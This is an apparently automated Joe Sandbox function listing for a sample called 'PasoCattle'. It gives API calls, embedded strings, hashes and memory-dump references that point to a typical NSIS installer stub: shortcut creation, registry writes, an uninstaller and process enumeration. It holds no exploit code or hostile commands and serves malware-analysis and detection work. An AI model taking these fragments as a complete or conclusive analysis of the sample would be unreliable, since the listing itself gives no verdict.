Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Module32NextW, xrefs: 0040660A
EnumProcesses, xrefs: 004064AE
Kernel32.DLL, xrefs: 004065C7
EnumProcessModules, xrefs: 004064B6
Process32NextW, xrefs: 004065F4
PSAPI.DLL, xrefs: 00406490
Process32FirstW, xrefs: 004065E9
CreateToolhelp32Snapshot, xrefs: 004065E1
GetModuleBaseNameW, xrefs: 004064C0
Unknown, xrefs: 00406528
Module32FirstW, xrefs: 004065FF

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
N, xrefs: 00404298
F, xrefs: 004042D3

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
%s=%s, xrefs: 00406B6F
plF, xrefs: 00406B54
^F, xrefs: 00406ACF
[Rename], xrefs: 00406BF4, 00406C03

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,76E223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,76E223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
`G, xrefs: 0040246E
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
